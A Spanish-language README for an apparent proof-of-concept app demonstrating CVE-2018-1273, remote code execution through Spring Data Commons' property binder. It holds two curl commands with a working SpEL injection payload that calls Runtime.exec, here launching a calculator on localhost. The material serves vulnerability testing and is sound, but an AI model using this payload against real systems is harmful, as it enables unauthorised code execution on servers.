
Exploit de prueba de concepto para CVE-2018-1273, una vulnerabilidad del enlazador de propiedades de Spring Data Commons que conduce a la ejecución remota de código a través de parámetros de solicitud HTTP manipulados.
Spring Data Commons, versiones anteriores a 1.13 hasta 1.13.10, 2.0 hasta 2.0.5, y versiones antiguas no soportadas, contienen una vulnerabilidad de enlace de propiedades causada por una neutralización incorrecta de elementos especiales. Un usuario malintencionado remoto no autenticado (o atacante) puede suministrar parámetros de solicitud especialmente manipulados contra recursos HTTP respaldados por Spring Data REST o mediante el enlace de cargas útiles de solicitud basado en proyecciones de Spring Data, lo que puede conducir a un ataque de ejecución remota de código.
Más información aquí
La aplicación puede probarse con la versión vulnerable o con la versión corregida de Spring Data Commons.
mvn spring-boot:run
mvn spring-boot:run -Dfixed
Ejecute el siguiente comando para comprobar si la vulnerabilidad puede explotarse:
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"
Creado por https://www.arima.eu
